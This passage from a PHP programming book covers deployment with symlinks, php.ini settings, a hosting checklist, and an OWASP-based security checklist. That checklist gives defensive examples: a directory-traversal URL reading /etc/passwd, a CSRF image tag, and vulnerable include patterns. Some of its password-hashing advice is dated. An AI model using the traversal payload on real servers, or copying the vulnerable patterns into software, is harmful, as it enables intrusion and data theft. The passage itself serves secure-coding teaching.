 ➥ https://example.com/svn/project/tag/2007-01-01-NewYearAnnc

 ➥ -m 'New Year announcements' 



Create an export of the tag on your production server:

 $ svn export

 ➥ https://example.com/svn/project/tag/2007-01-01-NewYearAnnc
 ➥ /path/to/web/2007-01-01-NewYearAnnc


Then, when you’re ready to launch the changes, use a symlink. A symlink, or
symbolic link, is a special directory entry in Unix-based operating systems. A
symlink is not a literal directory entry, like a directory or file, but is a reference to
another directory entry. In this example, we’ll assume that /path/to/web/production
is where your site is installed. This will be a symlink. When it comes time to launch,
make a note of the location to which the symlink points, then execute the following
command:

 $ rm /path/to/web/production 

 $ ln -s /path/to/web/2007-01-01-NewYearAnnc /path/to/web/production 



If you need to roll back to the previous version, simply point the symlink to the
previous install directory.
470   The PHP Anthology

      Using a Build System
      Additional tasks will, more than likely, need to be undertaken during deployment.
      Often, user-generated content is not kept in the repository, so it will need to be
      transferred into the new installation directory prior to launch. If database changes
      have been made between versions, they will also need to be applied, or a separate
      database will need to be used, and content synchronized between production and
      the staging install. If many additional tasks, such as the ones mentioned here, are
      required when you deploy a new version of your web site, you may need to invest­
      igate using a build system that can take care of this sort of thing for you. Examples
      include:

      GNU Make (http://www.gnu.org/software/make/)
        The venerable GNU Make can be used for much more than C code, and has been
        used in many projects successfully for performing site installation and upgrade
        tasks.

      Phing (http://phing.info/trac/)
         Phing Is Not GNU Make is based on Apache Ant, a Java-build system. With
         Phing, you use XML build files to create your build targets and tasks.

      Take great care to determine all the tasks that you need to perform in order to suc­
      cessfully launch your site, and complete test runs on your development box regularly.
      The more numerous and complicated the tasks, the more likely you are to introduce
      errors. Adhere to the KISS principle—Keep It Simple Stupid—as much as possible,
      and your project deployment will be more successful.

      Discussion
      If you have a team of programmers, make sure that the deployment process is so
      easy that any single member of your team could deploy it on his or her own box
      with a minimum of effort.

      The symlink method may seem overly simplistic, but, as I think I’ve mentioned,
      the simpler you can keep the deployment process, the greater the likelihood that
      it’ll be a success. Ultimately, the success of any deployment will depend upon the
      overall development process, from planning, to coding, to final release—and
      everything in between. If you’re coding for extensibility, writing and running your
      unit tests, documenting your code, and making efficient and effective use of your
Best Practices     471

revision control software, simple, reliable processes may be all you need when it
comes to final deployment.


Summary
Best practices encompass a wide variety of topics, any one of which could be covered
in a chapter of its own—or even a book. Many of the concerns we covered in this
chapter may seem unimportant at first, especially if you’re the sole maintainer of
your project, or work in a small group of like-minded developers. However, the first
time you need to work on a public project, or with another team of developers—or,
worse, delete your project tree or introduce an error into your project—the value of
these practices will become readily apparent.

Revision control will quickly become your friend, particularly when you want to
keep your production code stable while continuing development on your project,
be it to add new features or fix bugs. When you need to develop a feature that touches
many areas of code, being able to branch to keep your changes isolated from the
main development trunk becomes an invaluable advantage.

Adopting a coding standard will save you many headaches as you have others review
your code, and you review the code of others. If you all write in the same style, the
code will be easier to read and decipher. Additionally, using sane file and class
naming conventions will make it easier to find code for later revisions, and prevent
the issues associated with naming collisions.

Code documentation is often overlooked. Tools like phpDocumentor make the
documentation of your code, while you write it, much easier. Run phpDocumentor
on your code base once, having written a few code blocks, and you’ll see how quickly
you can generate API documentation merely by adding a few comments to your
code.

I could have devoted an entire book to the subject of unit testing. I’d even go so far
as to say that unit testing is arguably the single best practice from this chapter that
you should learn and incorporate into your daily routine. Testing your code will
help you better define your interfaces, isolate them from each other, and develop
more stable, reliable code. Write tests, and, more importantly, run them often. Run
code coverage reports periodically to ensure that you exercise as much of your code
as possible.
472   The PHP Anthology

      Finally, an often-overlooked aspect of PHP development is the actual deployment
      process—the gritty details of pushing your code to the production server, and en­
      suring that you can roll back if it fails. Tools like GNU Make and Phing can help
      automate these tasks; however, don’t underestimate the simplicity of a good repos­
      itory strategy and symlinks. Often the simplest solution is best!

      I’ve only scratched the surface with the practices outlined in this chapter. Incorporate
      what you can into your daily habits, but also examine your processes constantly
      and ask yourself how you can perform tasks better. Refactoring your processes will
      ultimately be the most useful tool in your toolbox.
Appendix A: PHP Configuration

This quick reference to PHP configuration covers the most important general settings
you need to be aware of, either when running applications in a live environment,
or because they impact upon security or the way you write code.


Configuration Mechanisms
The primary mechanism for configuring PHP is the php.ini file. As the master file,
it provides you with control over all configuration settings. PHP’s manual contains
a guide to configuring PHP,1 and documents all the available configuration options,
and where they can be set.2 Note that some configuration options can only be set
in the php.ini file, while others can be set in other locations as discussed later in
this section.

Entries in the php.ini file generally take the following format:

    setting=value



Be sure to read the comments provided in the file before making changes, though.
The comments describe a few tricks, such as include_path using a colon (:) as a
separator on Unix and a semicolon (;) on Windows, that you’ll want to be aware
of.

Most web hosts won’t allow you to access to your php.ini file unless you have root
access to the system, which is typically not the case if you’re using a cheap, shared
hosting service. The alternative is to use .htaccess files to configure PHP (assuming
the web server is Apache).

An .htaccess file is a plain text file that you place in a public web directory, and use
to control the way Apache behaves when it comes to serving pages from that direct­
ory; for instance, you might identify in the .htaccess file the pages to which you’ll
allow public access. Note that the effect of an .htaccess file is recursive—it applies
to subdirectories as well.



1
    http://www.php.net/manual/en/configuration.php
2
    http://www.php.net/manual/en/ini.php
474   The PHP Anthology

      In order for you to configure PHP with .htaccess files, your hosting provider must
      have applied the Apache setting AllowOverride Options or AllowOverride All
      to your web directory in Apache’s main httpd.conf configuration file. If that has
      been done, you can use two Apache directives to modify PHP’s configuration:

      php_flag

          used for settings that have Boolean values (that is, on/off or 1/0), such as re­
          gister_globals


      php_value

          used to specify a string value for settings, such as the include_path setting

      Here’s an example of an .htaccess file:

       # Switch off register globals

       php_flag register_globals off


       # Set the include path

       php_value include_path ".:/home/username/pear"



      The final mechanism that controls PHP’s configuration is the group of functions
      that contains ini_set and ini_alter, which let you modify configuration settings,
      as well as ini_get, which allows you to check configuration settings, and
      ini_restore, which resets PHP’s configuration to the default value defined by
      php.ini and any .htaccess files. Here’s an example in which using ini_set allows us
      to avoid having to define our host, user name, and password when connecting to
      MySQL:

       ini_set('mysql.default_host', 'localhost');

       ini_set('mysql.default_user', 'harryf');

       ini_set('mysql.default_password', 'secret');

       if (!mysql_connect())

       {

         echo mysql_error();

       }

       else

       {

         echo 'Success';

       }
Appendix A: PHP Configuration          475

Be aware that for some settings, such as error_reporting, PHP provides alternative
functions that perform effectively the same job as ini_set. You can use whichever
approach you prefer.

Note that certain settings, such as register_globals, can only be usefully modified
by php.ini or .htaccess, because such settings influence PHP’s behavior before it begins
to execute your scripts.

Furthermore, some configuration settings can be changed only in php.ini—exten­
sion_dir, for instance, which tells PHP the directory in which PHP extensions can
be found. For a complete reference on controlling settings, refer to The PHP Manual.3


Key Security and Portability Settings
Table A.1 shows the most important PHP settings that relate to the security and
portability of your PHP scripts.


Includes and Execution Settings
Table A.2 shows the most important PHP settings that relate to includes, and how
well your PHP scripts run.




3
    http://www.php.net/ini_set
476   The PHP Anthology

      Table A.1. Key Security and Portability Settings

               Setting          Default                            Notes

       register_globals
        off
        This setting automatically creates global variables
                                            from incoming HTTP request variables, such as GET
                                            and POST. For security and portability reasons, it’s
                                            strongly recommended that you switch off this
                                            setting. See the section called “Turning
                                            register_globals Off” in Chapter 1 or
                                            http://www.php.net/register_globals/ for more
                                            details.

       magic_quotes_gpc
        off
        This setting automatically escapes quotes in
                                            incoming HTTP request variables with a backslash,
                                            helping to prevent SQL injection attacks. If you
                                            know what you’re doing, it’s usually better to switch
                                            off this functionality and handle the escaping
                                            yourself when inserting data into a database, given
                                            the problems this feature can cause with forms, and
                                            the performance overhead they introduce. See the
                                            section called “Checking for Magic Quotes” in
                                            Chapter 1 for information on making your scripts
                                            compatible with this feature.

       call_time_pass_reference
 off
       This setting allows you to use variable references
                                            (e.g. htmlentities(&$string)) at call time.
                                            To keep code clean and understandable, and to
                                            ensure its portability, keep this functionality
                                            switched off.

       short_open_tag
          on
         This setting allows you to start a block of PHP code
                                            with just <? instead of the longer <?php. It also
                                            lets you write out PHP expressions with <?=, which
                                            is identical to <?php echo. While convenient,
                                            these shortcuts are not XML compliant, and can
                                            cause the PHP processor to become confused when
                                            it encounters XML processing instructions such as
                                            <?xml version="1.0"?>. Many people have
                                            short_open_tag switched off, so, for maximum
                                            portability, avoid the shortcuts and switch off this
                                            feature during development.
Appendix A: PHP Configuration                  477

           Setting   Default                               Notes

asp_tags             off            A setting that allows ASP-style tags (<% … %>) to
                                    be used as an alternative to the PHP open and close
                                    tags (<?php … ?>). Few people use this feature,
                                    so, for maximum portability, it’s best to avoid them,
                                    and switch off this feature during development.

error_reporting
     E_ALL &
       When developing, and for maximum portability, it’s
                     ~E_NOTICE
 best to set this option to E_ALL (or E_STRICT
                                in PHP 5), so that PHP will inform you of situations
                                    where, for example, a $_GET variable your code
                                    relies upon has not been initialized. This forces you
                                    to write code that’s more secure and contains fewer
                                    logic errors, in order to avoid warnings. This also
                                    ensures that your code will run neatly on other
                                    servers configured this way.

display_errors
      on
            This setting determines whether or not PHP sends
                                    error messages to the browser. When you’re running
                                    your application in a live environment, it’s generally
                                    better to switch off this option, and instead to use
                                    PHP’s logging mechanism to capture errors to a file,
                                    for example.

open_basedir
        not set        This setting allows you to restrict all PHP file
                                    operations to a given directory and its
                                    subdirectories. This can be a good idea if, for
                                    example, you want to prevent a script that’s used
                                    to display the contents of files from being used to
                                    access sensitive files elsewhere on your server.

allow_url_fopen      on             This setting allows you to specify remote file
                                    locations for use with functions like fopen (e.g.
                                    fopen('http://www.sitepoint.com/','r');).
                                    It’s a handy tool but is also potentially a security
                                    risk for a badly written script. Switch it off if you
                                    know you don’t need it.
478   The PHP Anthology

      Table A.2. Includes and Execution Settings

                Setting          Default                            Notes

      include_path
              '.'
      This setting allows you to specify the relative and
                                           absolute paths that PHP should search when you use
                                           one of the include-related commands. Make sure you
                                           specify at least the current directory (.), or most
                                           third-party scripts will fail to work. On Unix systems,
                                           the list of directories is separated by colons (:), while
                                           on Windows the separator is a semicolon (;). To make
                                           your life easier, the constant
                                           DIRECTORY_SEPARATOR is set to represent the
                                           correct character based on the operating system,
                                           making it easier to produce cross-platform-compatible
                                           code.

      auto_prepend_file
         not set   PHP will execute the file(s) specified in this setting
                                           before executing any requested script. This setting is
                                           useful for performing site-wide operations such as
                                           security, logging, defining error handlers, stripping
                                           backslashes added by the magic quotes feature, and so
                                           on. It’s also useful for applications that you’re sure you
                                           will only use yourself, but is unsuitable for use in code
                                           you intend to distribute, as those who are unable to
                                           modify php.ini settings with .htaccess files will
                                           be unable to use such code. The list separator is the
                                           same as that used for the include_path setting.

      auto_append_file           not set   The twin of auto_prepend_file, this setting is
                                           executed after a requested script is executed.

      max_execution_time
        30
       This setting specifies the maximum execution time (in
                                           seconds) for which a PHP script run via a web server
                                           may be allowed to execute. Generally, it’s best to leave
                                           this as the default setting and use the
                                           set_time_limit function to extend the limit on
                                           a per-script basis. A value of 0 for either setting
                                           removes limitations on script execution time.
Appendix A: PHP Configuration                479

        Setting   Default                           Notes

memory_limit
     8M
       This setting determines the amount of memory PHP
                            has available to it at runtime. Usually, the default is
                            fine, but when you’re handling very large XML
                            documents, for example, or dealing with images, you
                            might need to increase it. The bigger this value, the
                            more memory a script actually uses, and the less
                            memory will be available for other applications running
                            on your server.

post_max_size
    8M
       This setting reflects the maximum amount of data that
                            PHP will accept via an HTTP POST (e.g. a form that
                            uploads an image). You might need to increase this
                            value if you have an application that will allow users
                            to upload bigger files.“
480   The PHP Anthology


      Error-related Settings

      Table A.3 shows the most important PHP settings that relate to the way PHP handles
      errors. Note that display_errors and error_reporting are not included here, as
      they were described in Table A.1.

      Table A.3. Error-related Settings

                 Setting            Default                                Notes

       log_errors                   off       This setting, in conjunction with error_log (below),
                                              allows you to log errors to a text file. It’s useful for a
                                              live site where you’ve switched off the display of errors
                                              to visitors.

       error_log                    not set   This setting allows you to specify the name of a file to
                                              which errors are logged when log_errors is
                                              switched on.

       ignore_repeated_errors       off       Using this setting, if the same error occurs multiple
                                              times from the same line of a given PHP script, the
                                              error will only be reported once per script execution.
                                              This setting helps prevent the massive log files that can
                                              result from errors that occur in loops and are logged
                                              to a text file.

       ignore_repeated_source       30        This setting is similar to
                                              ignore_repeated_errors, but, in this case, it
                                              suppresses repeated errors of the same type throughout
                                              a PHP script.

       report_memleaks              on        Make sure this setting is switched on, especially if
                                              you’re using experimental versions or nonstable releases
                                              of PHP. Otherwise, you might end up crashing your
                                              server once leaked memory has eaten up all the
                                              available space. error_reporting must be set to
                                              report warnings for this setting to apply.
Appendix A: PHP Configuration                481


Miscellaneous Settings

Table A.4 shows additional important settings that you should be aware of in your
PHP configuration.

Table A.4. Miscellaneous Settings

           Setting            Default                            Notes

 session.save_path            /tmp      If you’re storing sessions in files on a Windows-based
                                        system, you’ll need to modify this setting to an available
                                        directory to which PHP can write session files.

 session.use_cookies          1         This setting uses cookies to store the session ID on the
                                        client, rather than placing the session ID in the URL
                                        (which can present a risk to security).

 extension_dir                './'      This setting specifies the path under which compiled
                                        PHP extensions can be found. On Windows-based
                                        systems, it might be something like this: extension_dir
                                        = C:phpextensions

 extension                              On Windows-based systems only, this setting is used
                                        to identify all the extensions that should be loaded.
                                        The extensions specified should reside in the
                                        extension_dir path (above), for example, extension =
                                        php_xslt.dll.
The PHP Anthology
Appendix B: Hosting Provider Checklist

PHP, and, more generally, the LAMP combination of Linux, Apache, MySQL, and
PHP/Perl/Python, are widely available via literally thousands of web hosts at very
affordable prices. You can easily access quality web hosting that will suit 90% of
your needs quite inexpensively. That said, all PHP installations are not created
equal—their capabilities depend largely on the configuration settings defined in
php.ini, as well as the extensions the host has installed for you. A number of general
issues relating to the amount of control you’re given over your own environment
also deserve consideration if you’re to avoid trouble later on.

This appendix summarizes the key issues you should investigate before paying for
a hosting service. Contact potential providers and ask them to respond to each of
these points. Follow up by asking for the opinions of other people who’ve used the
service in question—there are many online forums where you’ll find people who
are able to offer advice. Be aware, though, that the ratio of “knowledgeable” to “ig­
norant” people is stacked highly in favor of ignorance; familiarize yourself with
technical details so that you’re able to verify that the answers you’re given are well
informed.

Some of the points I’ve included here may seem a little extreme, but once you’ve
been around the block a few times, you’ll probably want to get value for your money,
rather than spending your Saturday mornings fixing the problems your host made
for you on Friday night.


General Issues
Consider these issues whichever host you’re looking at—they’re the key markers of
a decent service.

Does the host support Linux and Apache?
From the point of view of performance and reliability, the Linux–Apache setup is
the best combination. Ask for details of the Linux distribution. Although Red Hat
and its derivatives (such as CentOS and Fedora) are popular, you might find hosts
using Debian or Ubuntu—or, better yet, Rock Linux—know more about what they’re
doing.
484   The PHP Anthology

      Avoid any host that uses Apache 2.x with a threaded multiprocessing module
      (MPM), as there are still many third-party libraries that aren’t thread safe. Stick with
      a host that offers Apache 2.x with the prefork MPM, or Apache 1.3.x.

      Does the host provide you with SSH access to the
      server?
      SSH gives you a secure connection to the server, through which you can perform
      tasks from the Linux command line, or transfer files with SCP (Secure Copy Protocol)
      or SFTP (SSH File Transfer Protocol). Avoid any host that allows you to use telnet,
      as this is a fundamentally insecure way to connect to a server over the Internet. For
      Windows users, Putty1 makes an excellent SSH client and command line tool, while
      WinSCP2 provides a secure file transfer mechanism using an SSH connection.

      Alternatively, make sure you can upload files using FTPS (FTP over SSL). Don’t
      transfer files with FTP—it’s as insecure as telnet.

      Is the host a reseller, or does it maintain servers
      itself?
      Resellers can provide significant value if you need help at a basic technical level
      (if, for example, you’re a beginner), but they generally have the same level of control
      over the server as you do. Going “straight to the source” means you won’t have to
      deal with delays when there are system problems, as you’ll likely be dealing directly
      with those who maintain the server. The downside is that they tend to be less
      newbie tolerant, so you might get answers—but not ones you can understand!

      To what degree does the host “overload” the server?
      Many web hosting companies create far more accounts on a server than the maximum
      for which the system is specified. To gauge the degree of server overload, the best
      metric is obtained using the uptime command (if you have access to use it); this
      will tell you the server load averages over one, five, and 15 minutes. Ideally, the
      server should never have load averages above one. Obviously, the issue isn’t really
      as simple as this, but once you see your server hit averages in excess of five, you’ll
      begin to experience significant delays in your PHP-based applications.

      1
          http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
      2
          http://winscp.net/eng/
Appendix B: Hosting Provider Checklist        485


What’s the hosting provider’s policy on running scripts
and programs from the command line?
MySQLDump is a very handy tool for backing up your database, but it’s no good if
you can’t run it on your server. Some hosts automatically kill any command line
application that executes for longer than a given time, so be sure to investigate this
issue.

Does the host provide you access to cron, the Unix
utility that allows you to schedule batch jobs?
If so, make sure the host allows command line scripts to be executed. Some hosts
have taken to implementing cron so that it executes scripts via a web URL, but this
is no use if the script in question uses the MySQLDump application to back up your
database—a PHP script executed via Apache will typically run as a user, which will
not have the correct permissions required for the job.


PHP-related Issues
These considerations relate specifically to PHP and the way it’s set up on the server.

Can you see the output of phpinfo on the server you
will actually be assigned to?
Some hosts might claim this is a security risk, but expert hosts know that security
by obscurity is no substitute for real security. The information provided by phpinfo
is not a security risk to hosting providers that know what they’re doing, and have
Linux, Apache, and firewalls correctly set up. What phpinfo tells you is the best
way to confirm the facts.

Is PHP installed as an Apache module (not the CGI
variant)?
PHP installed as an Apache module provides much better performance than if PHP
is running in CGI mode.
486   The PHP Anthology


      Is the Apache settingAllowOverride set to
      Options or All?
      This setting will let you modify php.ini settings with .htaccess files.

      Is PHP Safe Mode disabled?
      The safe_mode option in php.ini is, in theory, a way to make PHP secure, and prevent
      users from performing certain tasks or using certain functions that are security
      sensitive. Safe Mode is nothing but a large headache if you’re doing any serious
      work in PHP.

      Check the upgrade policy of your host.
      Ask the host how much warning you will get before upgrades are performed. Check
      that they’ll provide you with a copy of the php.ini file they’ll be using for the upgrade
      before it happens—the number of hosts that, overnight, switch from register_glob­
      als=on to register_globals=off is considerable. Make sure you test your applic­
      ations on your development system against the new version before the host performs
      the upgrade.

      Ask for a list of installed PHP extensions.
      Confirm that these extensions match the requirements of your applications—few
      hosts, for example, bother to provide the XSLT extension. Confirm also that the
      host guarantees that all extensions will remain available between PHP upgrades.

      Will PHP be available for use from the command line?
      If not, you might alternatively require access to Perl or Python, or the ability to run
      shell scripts, if you’re happy with those languages. Usually, running a serious web
      site will require that you have the ability to run routine batch jobs (with cron) for
      tasks like backups, mailing yourself the PHP error log, and so on.

      What’s the host’s knowledge of PHP?
      Last but not least, throw in one or two questions that will test your hosting provider’s
      knowledge of PHP. Although it might not be the host’s job to write PHP code, when
      you find yourself in the position of knowing a lot more about PHP than your host,
Appendix B: Hosting Provider Checklist    487

the end result is depressing. It’s important to have a host that understands your
needs.
The PHP Anthology
Appendix C: Security Checklist
Given that online PHP applications are exposed essentially to anyone and everyone,
security should be on, if not at the top of, your list of concerns as you develop your
applications. To some extent, the ease with which PHP applications can be developed
is also one of the language’s greatest weaknesses: for beginners who aren’t aware of
the possible dangers, it’s very easy to deploy an application for which the line of
security has as many holes as Swiss cheese.

Make sure you’re informed and, if in any doubt, prepared to ask questions. The
Open Web Application Security Project (OWASP) is a corporate-sponsored com­
munity focused on raising the awareness of web security, and is an excellent source
of information on potential dangers.1 They OWASP recently updated its list of the
top ten common security flaws in web applications, the relevant points of which
I’ve summarized here. The previous version from 2004 still contains relevant inform­
ation and, while there’s some duplication, it’s well worth a read.2

For a more detailed coverage of PHP security, you might like to read Essential PHP
Security by Chris Shiflett,3 and php|architect’s Guide to PHP Security by Ilia
Alshanetsky.4


Top Security Vulnerabilities
This list comprises the most common—and dangerous—security flaws found in
web applications today.

Cross-site Scripting (XSS)
Cross-site scripting attacks are the result of sending unchecked, user-supplied data
to a browser. The problem with user-supplied data is that it’s completely outside
of your control, and it’s easy to fake values like the HTTP referrer and the values
in a hidden form field.




1
  http://www.owasp.org/
2
  http://www.owasp.org/index.php/Top_10_2004
3
  http://phpsecurity.org/
4
  http://www.phparch.com/pgps/
490   The PHP Anthology

      When dealing with forms, for example, validate the data carefully, and use a “deny
      all, permit a little” policy. For example, if a registration form has a field for the
      user’s username, allow only alphabetical characters and perhaps the numbers 0–9,
      rather than simply rejecting particular special characters. Use regular expressions
      to limit the data to exactly that which you require. Packages like
      PEAR::HTML_QuickForm, which we saw in “How do I build HTML forms with PHP?”
      in Chapter 5, provide built-in mechanisms for validating forms, and do a lot to help
      cover weaknesses you might otherwise neglect.

      Without these checks, it might be possible for a malicious user to create an account
      with a username like this:

          John

          Doe<script type="text/javascript">…</script>



      This username includes a JavaScript file that connects to another server and sends
      the current user’s session ID. Any person who then sees this username in the web
      browser (when browsing a forum, for example) will be sending his or her session
      ID to the remote server, allowing “John Doe” to connect to the web site as them.

      Of course, this tactic isn’t limited to user names; the same trick could be employed
      to exploit blog comment areas, the content of a forum post, or even the filename of
      an uploaded image. Less serious, but equally embarrassing, is when malicious users
      simply post HTML that “scrambles” the layout of your page, perhaps closing a table
      tag prematurely. Employ a separate markup language such as BBCode where pos­
      sible,5 and eliminate HTML with PHP functions like strip_tags and
      htmlspecialchars (see Chapter 3 for more on this). If you really want to allow
      HTML to be posted to your application, consider building a filter based on
                            6
      PEAR::XML_HTMLSax.

      Also, where items like include files are concerned, watch out for logic like this:

          include($_GET['page']);



      Make sure you check the value of $_GET['page'] against a list of files you intend
      to include in your code:

      5
          http://www.phpbb.com/community/faq.php?mode=bbcode
      6
          http://pear.php.net/package/XML_HTMLSax/
Appendix C: Security Checklist       491


 $pages = array('news.php', 'downloads.php', 'links.php');

 if (in_array($_GET['page'], $pages))

 {

   include $_GET['page'];

 }

 else

 {

   include 'not_found.php';

 }



Without such checks, it’s very easy for an attacker to use code similar to this to ex­
ecute other PHP scripts—even if you didn’t write them, and they’re not stored on
your server.

Injection Flaws
Another example of the problems associated with the use of unchecked user-supplied
data values in a script, injection flaws allow an attacker to influence the way PHP
interacts with an external system, such as the file system or a database.

An SQL injection attack occurs when an attacker uses a form or URL to modify a
database query, and the topic was discussed in some detail in “How do I protect
my web site from an SQL injection attack?” in Chapter 2. The bottom line is: escape
all the data you receive from a user before you use it in a query.

Malicious File Execution
Any script that allows the execution of a file that doesn’t reside on the server will
enable an attacker to execute arbitrary code on your server. The consequences of
such an attack could involve the undetected extraction of data from your application,
or a total compromise of your server.

Malicious file execution attacks are applicable to any system that takes filenames,
in part or in whole, or files from the user, and this issue ties in closely with that of
cross-site scripting attacks.

Insecure Direct Object Reference
You’ve seen URLs such as this before:
492   The PHP Anthology


       http://site.com/view_order/?orderid=123



      Perhaps you’ve tried changing the value of orderid. This is one example of a direct
      object reference attack—most are easy to prevent, however. For example, to make
      sure that a user can only see his or her own orders on your site, you might use SQL
      like the following to confirm that the ordered items stored in the database have the
      same user_id as the current user’s user_id session value:

       $sql = 'SELECT * FROM order WHERE order_id=' .

           intval( $_GET['orderid'] ) . ' AND user_id=' .

           $_SESSION['user']->get('user_id');



      Another form of direct object reference attack can be made by exploiting the way
      files are referenced within a script. Scripts that reference files on the basis of user-
      submitted data could be used to reveal information stored outside the web site’s
      document root. For example, take this innocuous-looking URL:

       http://site.com/welcome/?lang=en



      Behind the scenes, this URL tells a page to display in English by including the
      en.lang.php script:


       include( $_GET['lang'] . '.lang.php' );



      What do you imagine the following request would return from the above script?

       http://site.com/welcome/?lang=../../../../../../../etc/passwd%00



      The ../s will push the request to the root of the file system, and the %00 on the end
      of that URL uses the null termination trick, which will exploit the insecure include
      in the PHP script to include the /etc/passwd file—the list of all system users on
      the server. Because all strings in PHP are null terminated, the PHP interpreter will
      not see the '.lang.php' appended to the end.

      Remember—user-submitted information is not limited to the URL and form para­
      meters! You should check to ensure that unchecked cookie values, and HTTP request
      header and content values, aren’t used in your script, either.
Appendix C: Security Checklist         493


Cross-site Request Forgery (CSRF)
This type of attack forces victims to perform actions on another site without their
consent. As an example, such an attack might include an image in a forum message
using this code:

 <img src="http://www.google.com/accounts/ClearSID" />



This code would automatically log out of Google all forum visitors who visit the
page on which this code appears. More devastatingly, a CSRF could result in your
account details being altered, or even bank transfers being initiated, without your
consent.

Protection against this type of attack is actually easier for the site that’s being attacked
than for the site that’s unknowingly hosting the attack. To protect against the auto­
matic submission of forms, you could create a random token that’s regenerated for
every form view, and placed in a session variable and a hidden field in the form:

 <?php $_SESSION['token'] = md5( uniqid( rand(), true ) ); ?>

 <form action="sensitive_action.php" method="post">

 <input type="hidden" name="token" 

     value="<?php echo $_SESSION['token'] ?>"/>

 ⋮ …rest of the form
 </form>



When the form is submitted, a script checks that the token matches the value in the
session variable, which will only be the case if the form is loaded from the real
site—the page fails if the request comes from elsewhere.

Another option—especially for high-risk operations such as bank transfers and
password changes—is to require the user to confirm changes. This way, a forged
request will cause the real user to be prompted to confirm the action before it goes
ahead.

Information Leakage and Improper Error Handling
When errors occur in scripts, information that can be useful to attackers might be
leaked in error messages. Take, for example, a message such as this:
494   The PHP Anthology


          Warning: mysql_connect(): Access denied for user

          ➥ 'sitepoint'@'db.sitepoint.com' (using password: YES)
          ➥ in /var/www/index.php on line 12


      This information gives a potential attacker the database server’s name, the database
      name, and the user name.

      Similarly, error messages that output erroneous SQL statements give attackers a
      small view into your database structure—possibly their first step towards SQL in­
      jections.

      Refer to the section called “Key Security and Portability Settings” in Appendix A
      for information on disabling error output to the browser in production environments,
      and opting for error messages to be logged to a file instead.

      Broken Authentication and Session Management
      Broken authentication and session management vulnerabilities are closely tied to
      the inadequate protection of account and session data. We’ve already seen how
      sessions can be hijacked using cross-site scripting, and if the session is hijacked
      before a user logs in, the attacker simply needs to wait until the user logs in to gain
      full access to that person’s account.

      PHP offers the session_regenerate_id function,7 which should be used before
      any change in privilege level. Essentially, it maintains the session data, while
      changing the session ID. So after a user logs in, that person obtains a new session
      ID, and any previous sessions hijacked by the attacker are useless. You should also
      stick with PHP’s own session and cookie management functions—don’t write your
      own or use third-party scripts.

      Other measures you can take to prevent this type of vulnerability include ensuring
      that your site’s logout functionality completely destroys the session data, and
      automatically logging users out after a period of inactivity.

      It’s also advisable to not send passwords in plain text, either in emails or to be dis­
      played on screen. If you must email a password, ensure the user has to change that
      password upon the next login before he or she can continue to use the site.


      7
          http://www.php.net/session-regenerate-id/
Appendix C: Security Checklist        495


Insecure Cryptographic Storage
First of all, when it comes to cryptography, don’t roll your own code. Second, re­
member that if you’re encrypting data using an algorithm that’s meant to be decoded,
then someone else will also be capable of decoding it.

Remember that, strictly speaking, MD5 and SHA are not encryption algorithms (that
is, you can’t decrypt an MD5 string to obtain the original data); they are message
digest algorithms. But if you don’t need to decrypt a value, use SHA-256, which is
available through PHP 5.1.2’s hash8 [Usage: hash('sha256', $password);] function.
If this is not an option, you can opt for the less secure MD5 hash, which is available
through the md59 function.

This technique allows you to compare the encrypted versions of two pieces of data
(e.g. a stored password and that entered by a user), which avoids the risks involved
in working with encrypted values that could possibly be decrypted by an attacker.

Insecure Communications
Sending any type of sensitive information in plain text isn’t just bad practice, it’s
inexcusable. For example, if you’re asking a user to log in or provide credit card
details, you should be securing the communications using SSL. If your application
causes your server to talk to another server, for example a bank’s merchant services
system, that communication should also be secured using SSL.

Failure to Restrict URL Access
Most applications will limit the links available to users on the basis of their privilege
levels. For example, all users see a link to the homepage, but only administrators
have access to the link to the list of users. However, many applications’ user author­
ization systems stop at that point, which means that anyone who types in the full
URL to the user list page will gain access.

Make sure that your users only see the links they can use, but also make sure that
each page checks users’ privileges before allowing them to continue.




8
    http://www.php.net/hash/
9
    http://www.php.net/md5/
496   The PHP Anthology

      More information on this topic is available at PHP Advisory,10 although, sadly, the
      site is no longer being maintained.




      10
           http://www.phpadvisory.com/
Appendix D: Working with PEAR

PEAR,1 the PHP Extension and Application Repository, is the brainchild of Stig
Bakken, and was inspired by Perl’s CPAN.2

As a project, it was originally conceived in 1999 and reached its first stable release
in January 2003. PEAR serves two purposes. First, it provides a library of PHP classes
for solving common architectural problems, a number of which you’ve seen in this
book. Second, under the title PECL (PHP Extension Code Library), PEAR provides
a repository for extensions to PHP. PECL was originally intended to store nonstand­
ard extensions that lay more on the fringes of PHP, but it has since evolved into the
default repository for all the extensions that aren’t included in the core PHP distri­
bution. Here, I’ll be concentrating on the PHP classes that PEAR provides.

Those who submit work and maintain the PEAR repository are all volunteers. Ori­
ginally a small community of developers, the numbers of volunteers have grown
significantly since the release of the first stable version of PEAR, and the group re­
ceives a greater focus from the PHP community as a whole. There’s still a lot of
work to be done to raise the standards of PECL to that of PHP itself, documentation
being a key area in which there’s still much room for improvement. If you’re strug­
gling with a PEAR package, a good place to start is PHPKitchen’s list of PEAR Tu­
torials.3 That said, PEAR already offers significant value in terms of reducing the
effort required in developing PHP applications.

But what does PEAR actually mean to you? Browse the list of packages,4 and you’ll
see that PEAR provides many more classes, categorized by subject, to help you avoid
having to reinvent wheels. It’s important to understand that the focus of PEAR
classes is architectural issues, not application-level classes. In other words, you
won’t find complete applications there; rather, you’ll find code that can be reused
in many different applications. Also important is that the PEAR developer com­
munity does its best to maintain and support the library, which compares favorably
with, say, the projects available via SourceForge,5 which are often individual en­

1
  http://pear.php.net/

2
  http://www.cpan.org/

3
  http://www.phpkitchen.com/index.php?/archives/668-PEAR-Tutorials.html

4
  http://pear.php.net/packages.php

5
  http://sourceforge.net/
498   The PHP Anthology

      deavours and come to a sudden end once the individuals in question stop contrib­
      uting their time. Otherwise, there is some emphasis on maintaining a degree of
